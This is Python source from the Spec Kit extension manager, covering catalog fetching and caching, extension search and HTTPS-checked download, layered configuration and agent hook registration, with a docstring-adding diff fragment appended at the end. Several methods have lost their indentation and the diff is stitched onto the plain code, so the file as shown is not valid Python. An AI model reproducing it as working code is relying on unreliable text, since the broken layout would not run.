            with urllib.request.urlopen(entry.url, timeout=10) as response:
                catalog_data = json.loads(response.read())
            if "schema_version" not in catalog_data or "extensions" not in catalog_data:
                raise ExtensionError(f"Invalid catalog format from {entry.url}")
            # Save to cache
            self.cache_dir.mkdir(parents=True, exist_ok=True)
            cache_file.write_text(json.dumps(catalog_data, indent=2))
            cache_meta_file.write_text(json.dumps({
                "cached_at": datetime.now(timezone.utc).isoformat(),
                "catalog_url": entry.url,
            }, indent=2))
            return catalog_data
        except urllib.error.URLError as e:
            raise ExtensionError(f"Failed to fetch catalog from {entry.url}: {e}")
        except json.JSONDecodeError as e:
            raise ExtensionError(f"Invalid JSON in catalog from {entry.url}: {e}")
    def _get_merged_extensions(self, force_refresh: bool = False) -> List[Dict[str, Any]]:
        """Fetch all active catalogs and merge their extensions.

        Catalogs are processed in precedence order; the first catalog to
        define an extension ID wins and later definitions of the same ID are
        ignored. Each merged entry is annotated with its 'id' plus
        '_catalog_name' and '_install_allowed' from the providing catalog.

        Edge cases: a catalog that fails to fetch is skipped with a warning
        on stderr rather than aborting; ExtensionError is raised only when
        every configured catalog fails. An empty catalog list yields an
        empty result without error.

        Args:
            force_refresh: Passed through to each per-catalog fetch

        Returns:
            List of merged extension dicts

        Raises:
            ExtensionError: If no catalog could be fetched at all
        """
        import sys
        active_catalogs = self.get_active_catalogs()
        merged: Dict[str, Dict[str, Any]] = {}
        any_success = False
        for catalog_entry in active_catalogs:
            try:
                catalog_data = self._fetch_single_catalog(catalog_entry, force_refresh)
                any_success = True
            except ExtensionError as e:
                print(
                    f"Warning: Could not fetch catalog '{catalog_entry.name}': {e}",
                    file=sys.stderr,
                )
                continue
            for ext_id, ext_data in catalog_data.get("extensions", {}).items():
                if ext_id not in merged:  # Higher-priority catalog wins
                    merged[ext_id] = {
                        **ext_data,
                        "id": ext_id,
                        "_catalog_name": catalog_entry.name,
                        "_install_allowed": catalog_entry.install_allowed,
                    }
        if not any_success and active_catalogs:
            raise ExtensionError("Failed to fetch any extension catalog")
        return list(merged.values())
def is_cache_valid(self) -> bool:
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
try:
metadata = json.loads(self.cache_metadata_file.read_text())
cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
if cached_at.tzinfo is None:
cached_at = cached_at.replace(tzinfo=timezone.utc)
age_seconds = (datetime.now(timezone.utc) - cached_at).total_seconds()
return age_seconds < self.CACHE_DURATION
except (json.JSONDecodeError, ValueError, KeyError, TypeError):
return False
    def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
        """Fetch the primary catalog (legacy single-catalog API).

        Edge cases: a fresh-but-corrupt cached payload falls through to a
        network fetch rather than raising; the fetched catalog must contain
        'schema_version' and 'extensions'. On success the payload and a UTC
        'cached_at' timestamp are written to the legacy cache files.

        Args:
            force_refresh: If True, skip the cache-validity check

        Returns:
            Parsed catalog dict

        Raises:
            ExtensionError: On network failure, invalid JSON, or an invalid
                catalog structure.
        """
        # Check cache first unless force refresh
        if not force_refresh and self.is_cache_valid():
            try:
                return json.loads(self.cache_file.read_text())
            except json.JSONDecodeError:
                pass  # Fall through to network fetch
        # Fetch from network
        catalog_url = self.get_catalog_url()
        try:
            import urllib.request
            import urllib.error
            with urllib.request.urlopen(catalog_url, timeout=10) as response:
                catalog_data = json.loads(response.read())
            # Validate catalog structure
            if "schema_version" not in catalog_data or "extensions" not in catalog_data:
                raise ExtensionError("Invalid catalog format")
            # Save to cache
            self.cache_dir.mkdir(parents=True, exist_ok=True)
            self.cache_file.write_text(json.dumps(catalog_data, indent=2))
            # Save cache metadata
            metadata = {
                "cached_at": datetime.now(timezone.utc).isoformat(),
                "catalog_url": catalog_url,
            }
            self.cache_metadata_file.write_text(json.dumps(metadata, indent=2))
            return catalog_data
        except urllib.error.URLError as e:
            raise ExtensionError(f"Failed to fetch catalog from {catalog_url}: {e}")
        except json.JSONDecodeError as e:
            raise ExtensionError(f"Invalid JSON in catalog: {e}")
def search(
self,
query: Optional[str] = None,
tag: Optional[str] = None,
author: Optional[str] = None,
verified_only: bool = False,
) -> List[Dict[str, Any]]:
all_extensions = self._get_merged_extensions()
results = []
for ext_data in all_extensions:
ext_id = ext_data["id"]
# Apply filters
if verified_only and not ext_data.get("verified", False):
continue
if author and ext_data.get("author", "").lower() != author.lower():
continue
if tag and tag.lower() not in [t.lower() for t in ext_data.get("tags", [])]:
continue
if query:
# Search in name, description, and tags
query_lower = query.lower()
searchable_text = " ".join(
[
ext_data.get("name", ""),
ext_data.get("description", ""),
ext_id,
]
+ ext_data.get("tags", [])
).lower()
if query_lower not in searchable_text:
continue
results.append(ext_data)
return results
def get_extension_info(self, extension_id: str) -> Optional[Dict[str, Any]]:
all_extensions = self._get_merged_extensions()
for ext_data in all_extensions:
if ext_data["id"] == extension_id:
return ext_data
return None
    def download_extension(self, extension_id: str, target_dir: Optional[Path] = None) -> Path:
        """Download an extension ZIP referenced by the merged catalogs.

        Security: the download URL must use HTTPS; plain HTTP is allowed
        only for localhost hosts (localhost, 127.0.0.1, ::1), which guards
        against man-in-the-middle payload swaps while still permitting
        local testing.

        Args:
            extension_id: Extension to download
            target_dir: Destination directory; defaults to the catalog
                cache's 'downloads' subdirectory (created if needed)

        Returns:
            Path to the downloaded '<id>-<version>.zip' file (version falls
            back to 'unknown' when absent from the catalog entry).

        Raises:
            ExtensionError: If the extension is unknown, has no download
                URL, the URL is non-HTTPS (and not localhost), the download
                fails, or the file cannot be written.
        """
        import urllib.request
        import urllib.error
        # Get extension info from catalog
        ext_info = self.get_extension_info(extension_id)
        if not ext_info:
            raise ExtensionError(f"Extension '{extension_id}' not found in catalog")
        download_url = ext_info.get("download_url")
        if not download_url:
            raise ExtensionError(f"Extension '{extension_id}' has no download URL")
        # Validate download URL requires HTTPS (prevent man-in-the-middle attacks)
        from urllib.parse import urlparse
        parsed = urlparse(download_url)
        is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
        if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
            raise ExtensionError(
                f"Extension download URL must use HTTPS: {download_url}"
            )
        # Determine target path
        if target_dir is None:
            target_dir = self.cache_dir / "downloads"
        target_dir.mkdir(parents=True, exist_ok=True)
        version = ext_info.get("version", "unknown")
        zip_filename = f"{extension_id}-{version}.zip"
        zip_path = target_dir / zip_filename
        # Download the ZIP file
        try:
            with urllib.request.urlopen(download_url, timeout=60) as response:
                zip_data = response.read()
            zip_path.write_bytes(zip_data)
            return zip_path
        except urllib.error.URLError as e:
            raise ExtensionError(f"Failed to download extension from {download_url}: {e}")
        except IOError as e:
            raise ExtensionError(f"Failed to save extension ZIP: {e}")
def clear_cache(self):
if self.cache_file.exists():
self.cache_file.unlink()
if self.cache_metadata_file.exists():
self.cache_metadata_file.unlink()
# Also clear any per-URL hash-based cache files
if self.cache_dir.exists():
for extra_cache in self.cache_dir.glob("catalog-*.json"):
if extra_cache != self.cache_file:
extra_cache.unlink(missing_ok=True)
for extra_meta in self.cache_dir.glob("catalog-*-metadata.json"):
extra_meta.unlink(missing_ok=True)
class ConfigManager:
    """Layered configuration manager for a single extension.

    Configuration is merged from four layers, lowest to highest precedence:
      1. Extension defaults (config.defaults in extension.yml)
      2. Project config ({extension_id}-config.yml)
      3. Local config (local-config.yml)
      4. Environment variables (SPECKIT_<EXT_ID>_<KEY_PATH>)

    A missing or unreadable file contributes an empty layer, so a broken
    config file never prevents the extension from loading.
    """

    def __init__(self, project_root: Path, extension_id: str):
        """Initialize the config manager.

        Args:
            project_root: Path to the project root directory
            extension_id: ID of the extension whose config is managed
        """
        self.project_root = project_root
        self.extension_id = extension_id
        self.extension_dir = project_root / ".specify" / "extensions" / extension_id

    def _load_yaml_config(self, file_path: Path) -> Dict[str, Any]:
        """Load a YAML config file, returning {} when it cannot be used.

        Edge cases: a nonexistent file, an empty file (yaml yields None),
        a YAML parse error, and an OS read error all yield an empty dict.
        """
        if not file_path.exists():
            return {}
        try:
            return yaml.safe_load(file_path.read_text()) or {}
        except (yaml.YAMLError, OSError):
            return {}

    def _get_extension_defaults(self) -> Dict[str, Any]:
        """Get default config values declared in the extension manifest."""
        manifest_path = self.extension_dir / "extension.yml"
        if not manifest_path.exists():
            return {}
        manifest_data = self._load_yaml_config(manifest_path)
        return manifest_data.get("config", {}).get("defaults", {})

    def _get_project_config(self) -> Dict[str, Any]:
        """Get project-level config from {extension_id}-config.yml."""
        config_file = self.extension_dir / f"{self.extension_id}-config.yml"
        return self._load_yaml_config(config_file)

    def _get_local_config(self) -> Dict[str, Any]:
        """Get machine-local config overrides from local-config.yml."""
        config_file = self.extension_dir / "local-config.yml"
        return self._load_yaml_config(config_file)

    def _get_env_config(self) -> Dict[str, Any]:
        """Build a nested config dict from SPECKIT_<EXT_ID>_* env vars.

        The extension ID has '-' replaced by '_' and is upper-cased to form
        the prefix. The remainder of each variable name is lower-cased and
        split on '_', each segment becoming one level of nesting, e.g.
        SPECKIT_MY_EXT_FOO_BAR=1 -> {"foo": {"bar": "1"}}. Values are
        always strings; callers must coerce types themselves.

        Edge case: if one variable sets a scalar at a path another variable
        needs as a nested dict (e.g. ..._X and ..._X_Y), the scalar
        intermediate is replaced by a dict instead of raising TypeError;
        when both forms exist, the variable processed last wins.
        """
        import os
        env_config: Dict[str, Any] = {}
        ext_id_upper = self.extension_id.replace("-", "_").upper()
        prefix = f"SPECKIT_{ext_id_upper}_"
        for key, value in os.environ.items():
            if not key.startswith(prefix):
                continue
            # Remove prefix and split into nesting segments
            config_path = key[len(prefix):].lower().split("_")
            # Build nested dict
            current = env_config
            for part in config_path[:-1]:
                # Replace non-dict intermediates so deeper keys never crash
                # (previously this raised TypeError on a scalar intermediate)
                if not isinstance(current.get(part), dict):
                    current[part] = {}
                current = current[part]
            # Set the final value
            current[config_path[-1]] = value
        return env_config

    def _merge_configs(self, base: Dict[str, Any], override: Dict[str, Any]) -> Dict[str, Any]:
        """Deep-merge override into base, returning a new dict.

        Nested dicts are merged recursively; any other value (including a
        dict replacing a scalar, or vice versa) is overwritten wholesale.
        Neither input dict is mutated.
        """
        result = base.copy()
        for key, value in override.items():
            if key in result and isinstance(result[key], dict) and isinstance(value, dict):
                # Recursive merge for nested dicts
                result[key] = self._merge_configs(result[key], value)
            else:
                # Override value
                result[key] = value
        return result

    def get_config(self) -> Dict[str, Any]:
        """Return the fully merged config (defaults < project < local < env)."""
        # Start with defaults
        config = self._get_extension_defaults()
        # Merge project config
        config = self._merge_configs(config, self._get_project_config())
        # Merge local config
        config = self._merge_configs(config, self._get_local_config())
        # Merge environment config
        config = self._merge_configs(config, self._get_env_config())
        return config

    def get_value(self, key_path: str, default: Any = None) -> Any:
        """Look up a dotted key path in the merged config.

        Returns default when any segment is missing or an intermediate
        value is not a dict (so 'a.b' on {'a': 1} yields default, not an
        error).
        """
        config = self.get_config()
        keys = key_path.split(".")
        current = config
        for key in keys:
            if not isinstance(current, dict) or key not in current:
                return default
            current = current[key]
        return current

    def has_value(self, key_path: str) -> bool:
        """Return True if the dotted key path exists in the merged config.

        A key explicitly set to None still counts as present; only missing
        segments or non-dict intermediates yield False.
        """
        config = self.get_config()
        keys = key_path.split(".")
        current = config
        for key in keys:
            if not isinstance(current, dict) or key not in current:
                return False
            current = current[key]
        return True
class HookExecutor:
    """Registers and evaluates extension lifecycle hooks.

    Hook registrations are persisted in .specify/extensions.yml under the
    "hooks" key, mapping event names to lists of hook entries. This class
    does not run hook commands itself; it surfaces which commands the AI
    agent should execute (see execute_hook / format_hook_message).
    """

    def __init__(self, project_root: Path):
        """Initialize the hook executor.

        Args:
            project_root: Path to the project root directory
        """
        self.project_root = project_root
        self.extensions_dir = project_root / ".specify" / "extensions"
        self.config_file = project_root / ".specify" / "extensions.yml"

    def get_project_config(self) -> Dict[str, Any]:
        """Load .specify/extensions.yml.

        Edge cases: a missing file, an empty file (yaml yields None), a
        YAML parse error, or an OS read error all yield the same default
        structure (no installs, no hooks, auto_execute_hooks enabled), so
        hook processing never hard-fails on a broken config.
        """
        if not self.config_file.exists():
            return {
                "installed": [],
                "settings": {"auto_execute_hooks": True},
                "hooks": {},
            }
        try:
            return yaml.safe_load(self.config_file.read_text()) or {}
        except (yaml.YAMLError, OSError):
            return {
                "installed": [],
                "settings": {"auto_execute_hooks": True},
                "hooks": {},
            }

    def save_project_config(self, config: Dict[str, Any]):
        """Write the config back to .specify/extensions.yml.

        Creates the parent directory if needed; key order is preserved
        (sort_keys=False) to keep diffs readable.
        """
        self.config_file.parent.mkdir(parents=True, exist_ok=True)
        self.config_file.write_text(
            yaml.dump(config, default_flow_style=False, sort_keys=False)
        )

    def register_hooks(self, manifest: ExtensionManifest):
        """Register all hooks declared by an extension manifest.

        Edge cases: a manifest without hooks is a no-op. Re-registering an
        extension replaces its existing entry for each event in place
        instead of appending a duplicate. New hooks default to enabled, and
        to optional=True unless the manifest says otherwise.

        Args:
            manifest: Extension manifest providing hook definitions
        """
        if not hasattr(manifest, "hooks") or not manifest.hooks:
            return
        config = self.get_project_config()
        # Ensure hooks dict exists
        if "hooks" not in config:
            config["hooks"] = {}
        # Register each hook
        for hook_name, hook_config in manifest.hooks.items():
            if hook_name not in config["hooks"]:
                config["hooks"][hook_name] = []
            # Add hook entry
            hook_entry = {
                "extension": manifest.id,
                "command": hook_config.get("command"),
                "enabled": True,
                "optional": hook_config.get("optional", True),
                "prompt": hook_config.get(
                    "prompt", f"Execute {hook_config.get('command')}?"
                ),
                "description": hook_config.get("description", ""),
                "condition": hook_config.get("condition"),
            }
            # Check if already registered
            existing = [
                h
                for h in config["hooks"][hook_name]
                if h.get("extension") == manifest.id
            ]
            if not existing:
                config["hooks"][hook_name].append(hook_entry)
            else:
                # Update existing
                for i, h in enumerate(config["hooks"][hook_name]):
                    if h.get("extension") == manifest.id:
                        config["hooks"][hook_name][i] = hook_entry
        self.save_project_config(config)

    def unregister_hooks(self, extension_id: str):
        """Remove every hook registered by an extension.

        Events left with an empty hook list are pruned entirely. No-op
        (nothing saved) when the config has no 'hooks' key.

        Args:
            extension_id: Extension whose hooks should be removed
        """
        config = self.get_project_config()
        if "hooks" not in config:
            return
        # Remove hooks for this extension
        for hook_name in config["hooks"]:
            config["hooks"][hook_name] = [
                h
                for h in config["hooks"][hook_name]
                if h.get("extension") != extension_id
            ]
        # Clean up empty hook arrays
        config["hooks"] = {
            name: hooks for name, hooks in config["hooks"].items() if hooks
        }
        self.save_project_config(config)

    def get_hooks_for_event(self, event_name: str) -> List[Dict[str, Any]]:
        """Get enabled hooks registered for an event.

        Edge case: hooks missing an 'enabled' key are treated as enabled.
        Unknown events yield an empty list.
        """
        config = self.get_project_config()
        hooks = config.get("hooks", {}).get(event_name, [])
        # Filter to enabled hooks only
        return [h for h in hooks if h.get("enabled", True)]

    def should_execute_hook(self, hook: Dict[str, Any]) -> bool:
        """Decide whether a hook's condition permits execution.

        Edge cases: a hook with no condition always executes; any error
        raised during condition evaluation fails closed (returns False)
        rather than propagating.
        """
        condition = hook.get("condition")
        if not condition:
            return True
        # Parse and evaluate condition
        try:
            return self._evaluate_condition(condition, hook.get("extension"))
        except Exception:
            # If condition evaluation fails, default to not executing
            return False

    def _evaluate_condition(self, condition: str, extension_id: Optional[str]) -> bool:
        """Evaluate a single hook condition string.

        Supported patterns (matched case-insensitively):
          - "config.key.path is set"
          - "config.key.path == 'value'" / "config.key.path != 'value'"
          - "env.VAR_NAME is set"
          - "env.VAR_NAME == 'value'" / "env.VAR_NAME != 'value'"

        Edge cases: config.* patterns require extension_id (returns False
        without one); YAML booleans are normalized to 'true'/'false' so the
        string comparison matches condition literals; a missing env var
        compares as the empty string; any unrecognized condition format
        returns False (fail-closed for safety).
        """
        import os
        condition = condition.strip()
        # Pattern: "config.key.path is set"
        if match := re.match(r'config\.([a-z0-9_.]+)\s+is\s+set', condition, re.IGNORECASE):
            key_path = match.group(1)
            if not extension_id:
                return False
            config_manager = ConfigManager(self.project_root, extension_id)
            return config_manager.has_value(key_path)
        # Pattern: "config.key.path == 'value'" or "config.key.path != 'value'"
        if match := re.match(r'config\.([a-z0-9_.]+)\s*(==|!=)\s*["\']([^"\']+)["\']', condition, re.IGNORECASE):
            key_path = match.group(1)
            operator = match.group(2)
            expected_value = match.group(3)
            if not extension_id:
                return False
            config_manager = ConfigManager(self.project_root, extension_id)
            actual_value = config_manager.get_value(key_path)
            # Normalize boolean values to lowercase for comparison
            # (YAML True/False vs condition strings 'true'/'false')
            if isinstance(actual_value, bool):
                normalized_value = "true" if actual_value else "false"
            else:
                normalized_value = str(actual_value)
            if operator == "==":
                return normalized_value == expected_value
            else:  # !=
                return normalized_value != expected_value
        # Pattern: "env.VAR_NAME is set"
        if match := re.match(r'env\.([A-Z0-9_]+)\s+is\s+set', condition, re.IGNORECASE):
            var_name = match.group(1).upper()
            return var_name in os.environ
        # Pattern: "env.VAR_NAME == 'value'" or "env.VAR_NAME != 'value'"
        if match := re.match(r'env\.([A-Z0-9_]+)\s*(==|!=)\s*["\']([^"\']+)["\']', condition, re.IGNORECASE):
            var_name = match.group(1).upper()
            operator = match.group(2)
            expected_value = match.group(3)
            actual_value = os.environ.get(var_name, "")
            if operator == "==":
                return actual_value == expected_value
            else:  # !=
                return actual_value != expected_value
        # Unknown condition format, default to False for safety
        return False

    def format_hook_message(
        self, event_name: str, hooks: List[Dict[str, Any]]
    ) -> str:
        """Format an agent-readable message describing hooks for an event.

        Returns "" when hooks is empty. Optional hooks are presented as
        suggestions; non-optional hooks include an 'EXECUTE_COMMAND:' line
        signaling the agent to run the command automatically.
        """
        if not hooks:
            return ""
        lines = ["\n## Extension Hooks\n"]
        lines.append(f"Hooks available for event '{event_name}':\n")
        for hook in hooks:
            extension = hook.get("extension")
            command = hook.get("command")
            optional = hook.get("optional", True)
            prompt = hook.get("prompt", "")
            description = hook.get("description", "")
            if optional:
                lines.append(f"\n**Optional Hook**: {extension}")
                lines.append(f"Command: `/{command}`")
                if description:
                    lines.append(f"Description: {description}")
                lines.append(f"\nPrompt: {prompt}")
                lines.append(f"To execute: `/{command}`")
            else:
                lines.append(f"\n**Automatic Hook**: {extension}")
                lines.append(f"Executing: `/{command}`")
                lines.append(f"EXECUTE_COMMAND: {command}")
        return "\n".join(lines)

    def check_hooks_for_event(self, event_name: str) -> Dict[str, Any]:
        """Check which hooks should run for an event.

        Returns a dict with 'has_hooks', 'hooks', and 'message'. Edge
        cases: an event with no registered (enabled) hooks yields
        has_hooks=False with an empty message; hooks whose conditions all
        fail yields has_hooks=False with an explanatory message instead.
        """
        hooks = self.get_hooks_for_event(event_name)
        if not hooks:
            return {
                "has_hooks": False,
                "hooks": [],
                "message": ""
            }
        # Filter hooks by condition
        executable_hooks = []
        for hook in hooks:
            if self.should_execute_hook(hook):
                executable_hooks.append(hook)
        if not executable_hooks:
            return {
                "has_hooks": False,
                "hooks": [],
                "message": f"# No executable hooks for event '{event_name}' (conditions not met)"
            }
        return {
            "has_hooks": True,
            "hooks": executable_hooks,
            "message": self.format_hook_message(event_name, executable_hooks)
        }

    def execute_hook(self, hook: Dict[str, Any]) -> Dict[str, Any]:
        """Return the execution payload for a hook.

        NOTE: this does not run anything itself — the AI agent performs the
        actual command execution; this just surfaces the metadata it needs.
        """
        return {
            "command": hook.get("command"),
            "extension": hook.get("extension"),
            "optional": hook.get("optional", True),
            "description": hook.get("description", ""),
            "prompt": hook.get("prompt", "")
        }

    def enable_hooks(self, extension_id: str):
        """Mark every hook registered by extension_id as enabled.

        Edge case: no-op (nothing saved) when the config has no 'hooks'
        key; otherwise the config is re-saved even if no hook matched.
        """
        config = self.get_project_config()
        if "hooks" not in config:
            return
        # Enable all hooks for this extension
        for hook_name in config["hooks"]:
            for hook in config["hooks"][hook_name]:
                if hook.get("extension") == extension_id:
                    hook["enabled"] = True
        self.save_project_config(config)

    def disable_hooks(self, extension_id: str):
        """Mark every hook registered by extension_id as disabled.

        Edge case: no-op (nothing saved) when the config has no 'hooks'
        key; otherwise the config is re-saved even if no hook matched.
        """
        config = self.get_project_config()
        if "hooks" not in config:
            return
        # Disable all hooks for this extension
        for hook_name in config["hooks"]:
            for hook in config["hooks"][hook_name]:
                if hook.get("extension") == extension_id:
                    hook["enabled"] = False
        self.save_project_config(config)
| --- +++ @@ -1,3 +1,10 @@+"""
+Extension Manager for Spec Kit
+
+Handles installation, removal, and management of Spec Kit extensions.
+Extensions are modular packages that add commands and functionality to spec-kit
+without bloating the core framework.
+"""
import json
import hashlib
@@ -20,18 +27,33 @@
class ExtensionError(Exception):
+ """Base exception for extension-related errors."""
pass
class ValidationError(ExtensionError):
+ """Raised when extension manifest validation fails."""
pass
class CompatibilityError(ExtensionError):
+ """Raised when extension is incompatible with current environment."""
pass
def normalize_priority(value: Any, default: int = 10) -> int:
+ """Normalize a stored priority value for sorting and display.
+
+ Corrupted registry data may contain missing, non-numeric, or non-positive
+ values. In those cases, fall back to the default priority.
+
+ Args:
+ value: Priority value to normalize (may be int, str, None, etc.)
+ default: Default priority to use for invalid values (default: 10)
+
+ Returns:
+ Normalized priority as positive integer (>= 1)
+ """
try:
priority = int(value)
except (TypeError, ValueError):
@@ -41,6 +63,7 @@
@dataclass
class CatalogEntry:
+ """Represents a single catalog entry in the catalog stack."""
url: str
name: str
priority: int
@@ -49,16 +72,26 @@
class ExtensionManifest:
+ """Represents and validates an extension manifest (extension.yml)."""
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "extension", "requires", "provides"]
def __init__(self, manifest_path: Path):
+ """Load and validate extension manifest.
+
+ Args:
+ manifest_path: Path to extension.yml file
+
+ Raises:
+ ValidationError: If manifest is invalid
+ """
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
+ """Load YAML file safely."""
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
@@ -68,6 +101,7 @@ raise ValidationError(f"Manifest not found: {path}")
def _validate(self):
+ """Validate manifest structure and required fields."""
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
@@ -123,48 +157,63 @@
@property
def id(self) -> str:
+ """Get extension ID."""
return self.data["extension"]["id"]
@property
def name(self) -> str:
+ """Get extension name."""
return self.data["extension"]["name"]
@property
def version(self) -> str:
+ """Get extension version."""
return self.data["extension"]["version"]
@property
def description(self) -> str:
+ """Get extension description."""
return self.data["extension"]["description"]
@property
def requires_speckit_version(self) -> str:
+ """Get required spec-kit version range."""
return self.data["requires"]["speckit_version"]
@property
def commands(self) -> List[Dict[str, Any]]:
+ """Get list of provided commands."""
return self.data["provides"]["commands"]
@property
def hooks(self) -> Dict[str, Any]:
+ """Get hook definitions."""
return self.data.get("hooks", {})
def get_hash(self) -> str:
+ """Calculate SHA256 hash of manifest file."""
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class ExtensionRegistry:
+ """Manages the registry of installed extensions."""
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, extensions_dir: Path):
+ """Initialize registry.
+
+ Args:
+ extensions_dir: Path to .specify/extensions/ directory
+ """
self.extensions_dir = extensions_dir
self.registry_path = extensions_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
+ """Load registry from disk."""
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
@@ -182,11 +231,18 @@ }
def _save(self):
+ """Save registry to disk."""
self.extensions_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, extension_id: str, metadata: dict):
+ """Add extension to registry.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Extension metadata (version, source, etc.)
+ """
self.data["extensions"][extension_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
@@ -194,6 +250,23 @@ self._save()
def update(self, extension_id: str, metadata: dict):
+ """Update extension metadata in registry, merging with existing entry.
+
+ Merges the provided metadata with the existing entry, preserving any
+ fields not specified in the new metadata. The installed_at timestamp
+ is always preserved from the original entry.
+
+ Use this method instead of add() when updating existing extension
+ metadata (e.g., enabling/disabling) to preserve the original
+ installation timestamp and other existing fields.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Extension metadata fields to update (merged with existing)
+
+ Raises:
+ KeyError: If extension is not installed
+ """
if extension_id not in self.data["extensions"]:
raise KeyError(f"Extension '{extension_id}' is not installed")
# Merge new metadata with existing, preserving original installed_at
@@ -214,25 +287,77 @@ self._save()
def restore(self, extension_id: str, metadata: dict):
+ """Restore extension metadata to registry without modifying timestamps.
+
+ Use this method for rollback scenarios where you have a complete backup
+ of the registry entry (including installed_at) and want to restore it
+ exactly as it was.
+
+ Args:
+ extension_id: Extension ID
+ metadata: Complete extension metadata including installed_at
+ """
self.data["extensions"][extension_id] = dict(metadata)
self._save()
def remove(self, extension_id: str):
+ """Remove extension from registry.
+
+ Args:
+ extension_id: Extension ID
+ """
if extension_id in self.data["extensions"]:
del self.data["extensions"][extension_id]
self._save()
def get(self, extension_id: str) -> Optional[dict]:
+ """Get extension metadata from registry.
+
+ Returns a deep copy to prevent callers from accidentally mutating
+ nested internal registry state without going through the write path.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ Deep copy of extension metadata, or None if not found
+ """
entry = self.data["extensions"].get(extension_id)
return copy.deepcopy(entry) if entry is not None else None
def list(self) -> Dict[str, dict]:
+ """Get all installed extensions.
+
+ Returns a deep copy of the extensions mapping to prevent callers
+ from accidentally mutating nested internal registry state.
+
+ Returns:
+ Dictionary of extension_id -> metadata (deep copies)
+ """
return copy.deepcopy(self.data["extensions"])
def is_installed(self, extension_id: str) -> bool:
+ """Check if extension is installed.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ True if extension is installed
+ """
return extension_id in self.data["extensions"]
def list_by_priority(self) -> List[tuple]:
+ """Get all installed extensions sorted by priority.
+
+ Lower priority number = higher precedence (checked first).
+ Extensions with equal priority are sorted alphabetically by ID
+ for deterministic ordering.
+
+ Returns:
+ List of (extension_id, metadata_copy) tuples sorted by priority.
+ Metadata is deep-copied to prevent accidental mutation.
+ """
extensions = self.data.get("extensions", {}) or {}
if not isinstance(extensions, dict):
extensions = {}
@@ -250,14 +375,41 @@
class ExtensionManager:
+ """Manages extension lifecycle: installation, removal, updates."""
def __init__(self, project_root: Path):
+ """Initialize extension manager.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.registry = ExtensionRegistry(self.extensions_dir)
@staticmethod
def _load_extensionignore(source_dir: Path) -> Optional[Callable[[str, List[str]], Set[str]]]:
+ """Load .extensionignore and return an ignore function for shutil.copytree.
+
+ The .extensionignore file uses .gitignore-compatible patterns (one per line).
+ Lines starting with '#' are comments. Blank lines are ignored.
+ The .extensionignore file itself is always excluded.
+
+ Pattern semantics mirror .gitignore:
+ - '*' matches anything except '/'
+ - '**' matches zero or more directories
+ - '?' matches any single character except '/'
+ - Trailing '/' restricts a pattern to directories only
+ - Patterns with '/' (other than trailing) are anchored to the root
+ - '!' negates a previously excluded pattern
+
+ Args:
+ source_dir: Path to the extension source directory
+
+ Returns:
+ An ignore function compatible with shutil.copytree, or None
+ if no .extensionignore file exists.
+ """
ignore_file = source_dir / ".extensionignore"
if not ignore_file.exists():
return None
@@ -304,6 +456,18 @@ manifest: ExtensionManifest,
speckit_version: str
) -> bool:
+ """Check if extension is compatible with current spec-kit version.
+
+ Args:
+ manifest: Extension manifest
+ speckit_version: Current spec-kit version
+
+ Returns:
+ True if compatible
+
+ Raises:
+ CompatibilityError: If extension is incompatible
+ """
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
@@ -328,6 +492,21 @@ register_commands: bool = True,
priority: int = 10,
) -> ExtensionManifest:
+ """Install extension from a local directory.
+
+ Args:
+ source_dir: Path to extension directory
+ speckit_version: Current spec-kit version
+ register_commands: If True, register commands with AI agents
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed extension manifest
+
+ Raises:
+ ValidationError: If manifest is invalid or priority is invalid
+ CompatibilityError: If extension is incompatible
+ """
# Validate priority
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
@@ -385,6 +564,20 @@ speckit_version: str,
priority: int = 10,
) -> ExtensionManifest:
+ """Install extension from ZIP file.
+
+ Args:
+ zip_path: Path to extension ZIP file
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed extension manifest
+
+ Raises:
+ ValidationError: If manifest is invalid or priority is invalid
+ CompatibilityError: If extension is incompatible
+ """
# Validate priority early
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
@@ -426,6 +619,15 @@ return self.install_from_directory(extension_dir, speckit_version, priority=priority)
def remove(self, extension_id: str, keep_config: bool = False) -> bool:
+ """Remove an installed extension.
+
+ Args:
+ extension_id: Extension ID
+ keep_config: If True, preserve config files (don't delete extension dir)
+
+ Returns:
+ True if extension was removed
+ """
if not self.registry.is_installed(extension_id):
return False
@@ -484,6 +686,11 @@ return True
def list_installed(self) -> List[Dict[str, Any]]:
+ """List all installed extensions with metadata.
+
+ Returns:
+ List of extension metadata dictionaries
+ """
result = []
for ext_id, metadata in self.registry.list().items():
@@ -523,6 +730,14 @@ return result
def get_extension(self, extension_id: str) -> Optional[ExtensionManifest]:
+ """Get manifest for an installed extension.
+
+ Args:
+ extension_id: Extension ID
+
+ Returns:
+ Extension manifest or None if not installed
+ """
if not self.registry.is_installed(extension_id):
return None
@@ -536,6 +751,15 @@
def version_satisfies(current: str, required: str) -> bool:
